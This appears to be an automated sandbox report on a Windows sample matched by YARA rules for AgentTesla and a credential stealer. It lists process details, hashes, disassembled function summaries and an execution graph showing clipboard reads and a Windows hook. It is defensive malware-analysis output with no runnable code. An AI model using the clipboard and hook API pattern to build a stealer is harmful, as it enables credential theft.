                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                                                                  Imagebase:0xcc0000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 01619BF0 Relevance: .2, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100882634.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1610000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cfe0dbe78adbe4c4a0eaa152e9d0078ad493b980a6da6f0a7d52ed6884d33c6
                                                                    • Instruction ID: 430a4e5b7bd1eeb21d23cdcc71c265de6fa5c85670fac35b8dcd0efcae660163
                                                                    • Opcode Fuzzy Hash: 8cfe0dbe78adbe4c4a0eaa152e9d0078ad493b980a6da6f0a7d52ed6884d33c6
                                                                    • Instruction Fuzzy Hash: 62710472D05608CFC7108F7ECEA16BABBF1EF46314F588566E4569B35AC3349982CB12
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01615E34 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 01615EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100882634.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1610000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 9073625dcfd5778297b8d26e1ca2eb0bb9f26185973b4aff8adbab0a182ac1ba
                                                                    • Instruction ID: 8621103a69b26eaaf7cb3c59961f5cc7c942347e7875d6cc4ce143db8f233335
                                                                    • Opcode Fuzzy Hash: 9073625dcfd5778297b8d26e1ca2eb0bb9f26185973b4aff8adbab0a182ac1ba
                                                                    • Instruction Fuzzy Hash: 1441E3B0C00219CFDB24CFA9C984BDDFBB5BF8A304F24806AD419AB255DB75594ACF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 016149DC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 01615EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100882634.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1610000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 4da28aba9855c1a8319503d79ed7ddc549d102440e7961abcc15a1a2bf184175
                                                                    • Instruction ID: 6f4ec3f4113fc50ed72138bb1682530587e2dce1ca43527e73c206d7990c2617
                                                                    • Opcode Fuzzy Hash: 4da28aba9855c1a8319503d79ed7ddc549d102440e7961abcc15a1a2bf184175
                                                                    • Instruction Fuzzy Hash: 5841E3B0C0061DCFDB24CFA9C844B9DFBB6BF89304F24806AD419AB255D7756949CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BD034 Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100476831.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13bd000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 76c283852c8b597181e8473603fb9fe7f3ced19ac6f7743bcad57077fc2940e7
                                                                    • Instruction ID: 437590742f44db8c0e7c5a9231fda1d3e8503163a75e846c3fb2e001301bcf64
                                                                    • Opcode Fuzzy Hash: 76c283852c8b597181e8473603fb9fe7f3ced19ac6f7743bcad57077fc2940e7
                                                                    • Instruction Fuzzy Hash: A531A17154D3809FD703CF64D894755BFB1EF46218F1885EAC9858B6A3D23A980ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013AD72C Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100425331.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13ad000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2afe8a8abb466fd1d66e56bc093215ba9ab678e0d4eceb4b8b390c56cd6e27ba
                                                                    • Instruction ID: 3bfa961f11bb7ce9286a036dcd72ce8f471c191ecccf31f16afefb693cde72fa
                                                                    • Opcode Fuzzy Hash: 2afe8a8abb466fd1d66e56bc093215ba9ab678e0d4eceb4b8b390c56cd6e27ba
                                                                    • Instruction Fuzzy Hash: CB216771500284DFCB0ADF58D9C0F26BF69FB88318F60C569E9090BA56C33BC416CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BD055 Relevance: .1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100476831.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13bd000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1067f098be6021a08f8b9098efac01050e860f12c2b7f47172d2441cc6811d3e
                                                                    • Instruction ID: eaaab89887c6de2a331aef1602d3fe8d5e68754f860e40951eed63a850bbcddd
                                                                    • Opcode Fuzzy Hash: 1067f098be6021a08f8b9098efac01050e860f12c2b7f47172d2441cc6811d3e
                                                                    • Instruction Fuzzy Hash: 0F21A0755483809FD703CF64D9C0755BF71FB46218F28C5EAD9498B6A3D33A980ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BD0DC Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100476831.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13bd000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95f5c731773a44631cb5f32dba85b0bbc23c3859d8c449dd59e28fff874f7875
                                                                    • Instruction ID: 4a43b322ef0b50202f0e0e7645fa84208271a1336b0abcdc8beec296ebb8a586
                                                                    • Opcode Fuzzy Hash: 95f5c731773a44631cb5f32dba85b0bbc23c3859d8c449dd59e28fff874f7875
                                                                    • Instruction Fuzzy Hash: 62212271504204DFDB45DF68D9C0B26BF69FB8831CF20C56DDA0A0BB56D33AD806CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BD294 Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100476831.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13bd000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ec2778ab18571c7fa3539424ce003f3fc2dd9960a141304461d903da971885e
                                                                    • Instruction ID: 23d639a760eb4f8fecec269fee46c302661f90a134e700b6a97390f1a8867e1f
                                                                    • Opcode Fuzzy Hash: 5ec2778ab18571c7fa3539424ce003f3fc2dd9960a141304461d903da971885e
                                                                    • Instruction Fuzzy Hash: 5A210371604244DFCB05CF98C5C0B26BFA5FB8832CF24C569DA0D0BA53D33AD806CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013AD727 Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100425331.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13ad000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                    • Instruction ID: ed3fe2821c1cd680b9eca2696de70b3d07328f03ebf3060054126011920dc4a7
                                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                    • Instruction Fuzzy Hash: 5F112676404280CFCB06CF44D5C4B16BF72FB88314F24C6A9D9490BA57C336D45ACBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BD28F Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100476831.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13bd000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: b380206c3aa5a195c9d4c856dab1d3e1207a768cb0facec045db8e8927798b7b
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: C411BB75508280CFDB02CF54D5C4B15BFA1FB84218F28C6A9D94D4BA53C33AD40ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0161E368 Relevance: .3, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2100882634.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1610000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cd1281c9e73aab765791a6f111d5367dac35947e5b874da441a4df85347052c9
                                                                    • Instruction ID: 61309ba3f647e6aea797780f06c46afb8d67818930e80ce8f560b6ece33ad0d1
                                                                    • Opcode Fuzzy Hash: cd1281c9e73aab765791a6f111d5367dac35947e5b874da441a4df85347052c9
                                                                    • Instruction Fuzzy Hash: 13D1E935C1075A8ACB11EF64D994A9DB771FFE5300F509B9AE00A7B210EB706EC9CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 065B0040 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2104730144.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: true
                                                                    • Associated: 00000000.00000002.2104574579.0000000006530000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6530000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91b9145814fa857218212ecc58d857041beb986bfe8aae16d8509df584f58278
                                                                    • Instruction ID: 27c5c6445b2a87fc111351f9edeae5495f7056d02f73807a30b7c9bcbdd019c0
                                                                    • Opcode Fuzzy Hash: 91b9145814fa857218212ecc58d857041beb986bfe8aae16d8509df584f58278
                                                                    • Instruction Fuzzy Hash: A701A9B1E056188BEB5CCF6B8C006DFFAF7AFC9300F08D0798408A6264EB7405458F55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:11.1%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:148
                                                                    Total number of Limit Nodes:18
                                                                    execution_graph 42091 151d044 42092 151d05c 42091->42092 42093 151d0b6 42092->42093 42098 6cd2750 42092->42098 42102 6cd6ed1 42092->42102 42110 6cd0884 42092->42110 42118 6cd2743 42092->42118 42099 6cd2776 42098->42099 42100 6cd0884 3 API calls 42099->42100 42101 6cd2797 42100->42101 42101->42093 42103 6cd6eda 42102->42103 42104 6cd6f61 42103->42104 42106 6cd6f51 42103->42106 42134 6cd5edc 42104->42134 42122 6cd7088 42106->42122 42128 6cd7086 42106->42128 42107 6cd6f5f 42107->42107 42111 6cd088f 42110->42111 42112 6cd6f61 42111->42112 42114 6cd6f51 42111->42114 42113 6cd5edc 3 API calls 42112->42113 42115 6cd6f5f 42113->42115 42116 6cd7088 3 API calls 42114->42116 42117 6cd7086 3 API calls 42114->42117 42115->42115 42116->42115 42117->42115 42119 6cd2747 42118->42119 42120 6cd0884 3 API calls 42119->42120 42121 6cd2797 42120->42121 42121->42093 42124 6cd7096 42122->42124 42123 6cd5edc 3 API calls 42123->42124 42124->42123 42125 6cd716e 42124->42125 42141 6cd7560 42124->42141 42146 6cd7551 42124->42146 42125->42107 42130 6cd7096 42128->42130 42129 6cd5edc 3 API calls 42129->42130 42130->42129 42131 6cd716e 42130->42131 42132 6cd7551 2 API calls 42130->42132 42133 6cd7560 2 API calls 42130->42133 42131->42107 42132->42130 42133->42130 42135 6cd5ee7 42134->42135 42136 6cd71ca 42135->42136 42137 6cd7274 42135->42137 42139 6cd7222 CallWindowProcW 42136->42139 42140 6cd71d1 42136->42140 42138 6cd0884 2 API calls 42137->42138 42138->42140 42139->42140 42140->42107 42142 6cd756c 42141->42142 42143 6cd7546 42142->42143 42151 6cd7b18 42142->42151 42157 6cd7b07 42142->42157 42143->42124 42147 6cd7556 42146->42147 42148 6cd7546 42147->42148 42149 6cd7b18 2 API calls 42147->42149 42150 6cd7b07 2 API calls 42147->42150 42148->42124 42149->42147 42150->42147 42153 6cd7b20 42151->42153 42152 6cd7b34 42152->42142 42153->42152 42163 6cd7b51 42153->42163 42175 6cd7b60 42153->42175 42154 6cd7b49 42154->42142 42159 6cd7b18 42157->42159 42158 6cd7b34 42158->42142 42159->42158 42161 6cd7b51 2 API calls 42159->42161 42162 6cd7b60 2 API calls 42159->42162 42160 6cd7b49 42160->42142 42161->42160 42162->42160 42164 6cd7b5a 42163->42164 42165 6cd7b8d 42164->42165 42167 6cd7bd1 42164->42167 42170 6cd7b51 2 API calls 42165->42170 42171 6cd7b60 2 API calls 42165->42171 42166 6cd7b93 42166->42154 42169 6cd7c51 42167->42169 42187 6cd7e28 42167->42187 42191 6cd7e18 42167->42191 42195 6cd7ec4 42167->42195 42168 6cd7c6f 42168->42154 42169->42154 42170->42166 42171->42166 42176 6cd7b72 42175->42176 42177 6cd7b8d 42176->42177 42179 6cd7bd1 42176->42179 42182 6cd7b51 2 API calls 42177->42182 42183 6cd7b60 2 API calls 42177->42183 42178 6cd7b93 42178->42154 42181 6cd7c51 42179->42181 42184 6cd7e18 OleGetClipboard 42179->42184 42185 6cd7e28 OleGetClipboard 42179->42185 42186 6cd7ec4 OleGetClipboard 42179->42186 42180 6cd7c6f 42180->42154 42181->42154 42182->42178 42183->42178 42184->42180 42185->42180 42186->42180 42189 6cd7e3d 42187->42189 42190 6cd7e63 42189->42190 42200 6cd78f0 42189->42200 42190->42168 42193 6cd7e28 42191->42193 42192 6cd78f0 OleGetClipboard 42192->42193 42193->42192 42194 6cd7e63 42193->42194 42194->42168 42196 6cd7ece OleGetClipboard 42195->42196 42198 6cd7e7f 42195->42198 42199 6cd7f6a 42196->42199 42198->42168 42201 6cd7ed0 OleGetClipboard 42200->42201 42203 6cd7f6a 42201->42203 42204 6cd2598 42205 6cd2600 CreateWindowExW 42204->42205 42207 6cd26bc 42205->42207 42208 6cd7d38 42209 6cd7d43 42208->42209 42211 6cd7d53 42209->42211 42212 6cd608c 42209->42212 42213 6cd7d88 OleInitialize 42212->42213 42214 6cd7dec 42213->42214 42214->42211 42047 3040848 42048 304084e 42047->42048 42049 304091b 42048->42049 42051 304132f 42048->42051 42053 3041333 42051->42053 42052 3041434 42052->42048 42053->42052 42055 3047e58 42053->42055 42056 3047e62 42055->42056 42057 3047ea4 42056->42057 42063 6cef948 42056->42063 42068 6cef939 42056->42068 42057->42053 42058 3047e75 42073 304eb18 42058->42073 42078 304eb09 42058->42078 42065 6cef95d 42063->42065 42064 6cefb72 42064->42058 42065->42064 42066 6cefb87 GlobalMemoryStatusEx 42065->42066 42067 6cefde0 GlobalMemoryStatusEx 42065->42067 42066->42065 42067->42065 42070 6cef948 42068->42070 42069 6cefb72 42069->42058 42070->42069 42071 6cefb87 GlobalMemoryStatusEx 42070->42071 42072 6cefde0 GlobalMemoryStatusEx 42070->42072 42071->42070 42072->42070 42074 304eb32 42073->42074 42075 304ed79 42074->42075 42076 6cefb87 GlobalMemoryStatusEx 42074->42076 42077 6cefde0 GlobalMemoryStatusEx 42074->42077 42075->42057 42076->42074 42077->42074 42080 304eb18 42078->42080 42079 304ed79 42079->42057 42080->42079 42081 6cefb87 GlobalMemoryStatusEx 42080->42081 42082 6cefde0 GlobalMemoryStatusEx 42080->42082 42081->42080 42082->42080 42083 6cd7480 42084 6cd7488 42083->42084 42086 6cd74ab 42084->42086 42087 6cd5f34 42084->42087 42088 6cd74c0 KiUserCallbackDispatcher 42087->42088 42090 6cd752e 42088->42090 42090->42084 42215 6cd62f0 DuplicateHandle 42216 6cd6386 42215->42216 42217 6cd14f0 42218 6cd1538 GetModuleHandleW 42217->42218 42219 6cd1532 42217->42219 42220 6cd1565 42218->42220 42219->42218 42221 6cd9a10 42224 6cd9a54 SetWindowsHookExA 42221->42224 42223 6cd9a9a 42224->42223

                                                                    Executed Functions

                                                                    Function 06CE2350 Relevance: 9.0, Strings: 6, Instructions: 1497COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3723351465
                                                                    • Opcode ID: daf602048adf0bf6c23a19be27a297ff0264e38f8d860169ab089d6c9d74317d
                                                                    • Instruction ID: 21da940a1bb0cfc29cc068137863d79a9ae039f5c73a7401c8c2b2078cd2d23d
                                                                    • Opcode Fuzzy Hash: daf602048adf0bf6c23a19be27a297ff0264e38f8d860169ab089d6c9d74317d
                                                                    • Instruction Fuzzy Hash: 00D24934A00209CFDB64DF68C584A9DB7F6FF89304F54C5AAD409AB265EB34EE85CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE7D60 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1351 6ce7d60-6ce7d7e 1352 6ce7d80-6ce7d83 1351->1352 1353 6ce7da6-6ce7da9 1352->1353 1354 6ce7d85-6ce7da1 1352->1354 1355 6ce7dab-6ce7db9 1353->1355 1356 6ce7dc0-6ce7dc3 1353->1356 1354->1353 1367 6ce7dbb 1355->1367 1368 6ce7e06-6ce7e1c 1355->1368 1358 6ce7de4-6ce7de7 1356->1358 1359 6ce7dc5-6ce7ddf 1356->1359 1360 6ce7de9-6ce7df3 1358->1360 1361 6ce7df4-6ce7df6 1358->1361 1359->1358 1364 6ce7dfd-6ce7e00 1361->1364 1365 6ce7df8 1361->1365 1364->1352 1364->1368 1365->1364 1367->1356 1371 6ce8037-6ce8041 1368->1371 1372 6ce7e22-6ce7e2b 1368->1372 1373 6ce8042-6ce8077 1372->1373 1374 6ce7e31-6ce7e4e 1372->1374 1377 6ce8079-6ce807c 1373->1377 1383 6ce8024-6ce8031 1374->1383 1384 6ce7e54-6ce7e7c 1374->1384 1378 6ce807e-6ce809a 1377->1378 1379 6ce809f-6ce80a2 1377->1379 1378->1379 1381 6ce80a8-6ce80b7 1379->1381 1382 6ce82d7-6ce82da 1379->1382 1393 6ce80b9-6ce80d4 1381->1393 1394 6ce80d6-6ce811a 1381->1394 1386 6ce8385-6ce8387 1382->1386 1387 6ce82e0-6ce82ec 1382->1387 1383->1371 1383->1372 1384->1383 1403 6ce7e82-6ce7e8b 1384->1403 1389 6ce838e-6ce8391 1386->1389 1390 6ce8389 1386->1390 1395 6ce82f7-6ce82f9 1387->1395 1389->1377 1396 6ce8397-6ce83a0 1389->1396 1390->1389 1393->1394 1408 6ce82ab-6ce82c1 1394->1408 1409 6ce8120-6ce8131 1394->1409 1398 6ce82fb-6ce8301 1395->1398 1399 6ce8311-6ce8315 1395->1399 1405 6ce8305-6ce8307 1398->1405 1406 6ce8303 1398->1406 1400 6ce8317-6ce8321 1399->1400 1401 6ce8323 1399->1401 1407 6ce8328-6ce832a 1400->1407 1401->1407 1403->1373 1410 6ce7e91-6ce7ead 1403->1410 1405->1399 1406->1399 1411 6ce832c-6ce832f 1407->1411 1412 6ce833b-6ce8374 1407->1412 1408->1382 1418 6ce8296-6ce82a5 1409->1418 1419 6ce8137-6ce8154 1409->1419 1420 6ce8012-6ce801e 1410->1420 1421 6ce7eb3-6ce7edd 1410->1421 1411->1396 1412->1381 1433 6ce837a-6ce8384 1412->1433 1418->1408 1418->1409 1419->1418 1430 6ce815a-6ce8250 call 6ce6578 1419->1430 1420->1383 1420->1403 1435 6ce8008-6ce800d 1421->1435 1436 6ce7ee3-6ce7f0b 1421->1436 1484 6ce825e 1430->1484 1485 6ce8252-6ce825c 1430->1485 1435->1420 1436->1435 1442 6ce7f11-6ce7f3f 1436->1442 1442->1435 1448 6ce7f45-6ce7f4e 1442->1448 1448->1435 1449 6ce7f54-6ce7f86 1448->1449 1457 6ce7f88-6ce7f8c 1449->1457 1458 6ce7f91-6ce7fad 1449->1458 1457->1435 1459 6ce7f8e 1457->1459 1458->1420 1460 6ce7faf-6ce8006 call 6ce6578 1458->1460 1459->1458 1460->1420 1486 6ce8263-6ce8265 1484->1486 1485->1486 1486->1418 1487 6ce8267-6ce826c 1486->1487 1488 6ce826e-6ce8278 1487->1488 1489 6ce827a 1487->1489 1490 6ce827f-6ce8281 1488->1490 1489->1490 1490->1418 1491 6ce8283-6ce828f 1490->1491 1491->1418
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q
                                                                    • API String ID: 0-127220927
                                                                    • Opcode ID: 8379933e516665e53d12242ecfac676df7704ac4e88f3b7c609db613e281badd
                                                                    • Instruction ID: 8e7b292ea1b92e9996043386a2ee88c3bcd707efd141f0b6df7e5551e3a6260f
                                                                    • Opcode Fuzzy Hash: 8379933e516665e53d12242ecfac676df7704ac4e88f3b7c609db613e281badd
                                                                    • Instruction Fuzzy Hash: B2029D30B012168FDB58DBA8D894AAEB7F2FF84304F148529D405EB395DB35ED82CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE65C8 Relevance: .8, Instructions: 815COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a29b03c7a755be6723763b6a5e8ef4a6022a96790bf3550cc5dc35136699c5c9
                                                                    • Instruction ID: 48af9d1bd3c0485ab43d4fe89d61c22f78603ecf440e3b70d2a1ae0c091604dd
                                                                    • Opcode Fuzzy Hash: a29b03c7a755be6723763b6a5e8ef4a6022a96790bf3550cc5dc35136699c5c9
                                                                    • Instruction Fuzzy Hash: 0D62CC34B202058FDB54DBA9D584BADBBF6EF88314F148469E406DB390DB35ED46CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEC168 Relevance: .6, Instructions: 639COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3af6a4c761350203b7a8beaac8c03a5eb338d498366f01d231d2ccdc29cc8216
                                                                    • Instruction ID: b1020a9f87e425161ed14c6b833713b11e2e882e6132284a1782eb4387aa95d0
                                                                    • Opcode Fuzzy Hash: 3af6a4c761350203b7a8beaac8c03a5eb338d498366f01d231d2ccdc29cc8216
                                                                    • Instruction Fuzzy Hash: 5632AF34B002098FDF54DBA8E894BADBBB6FB88310F108529D415EB395DB35ED46CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEB2B9 Relevance: .6, Instructions: 607COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 197890b5993fe2b9a221fe49342ead13b4a4ffd6eefa215cd46b76029cda693a
                                                                    • Instruction ID: 620b8f62ee256c1ff9cdd278ce6b012f4981248f10969ff910e3ea827ae81507
                                                                    • Opcode Fuzzy Hash: 197890b5993fe2b9a221fe49342ead13b4a4ffd6eefa215cd46b76029cda693a
                                                                    • Instruction Fuzzy Hash: C3225F30F1020A8FDF65CB68D6947BDBBB6EB85310F24882AD449DB391DA34DD85CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE55A8 Relevance: .6, Instructions: 591COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8815e582e81f4911b25de4305bc916bf2512d1b96a9ae035a627ea807a770c07
                                                                    • Instruction ID: 78d4d22fac18178267d93792429ae543470a9aeaaafa672f8f2b175f0b6cb023
                                                                    • Opcode Fuzzy Hash: 8815e582e81f4911b25de4305bc916bf2512d1b96a9ae035a627ea807a770c07
                                                                    • Instruction Fuzzy Hash: B612F435F102159FDB64DBA4D89076EB7B6FB84318F64882AD406DB381CB35ED42CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE9130 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
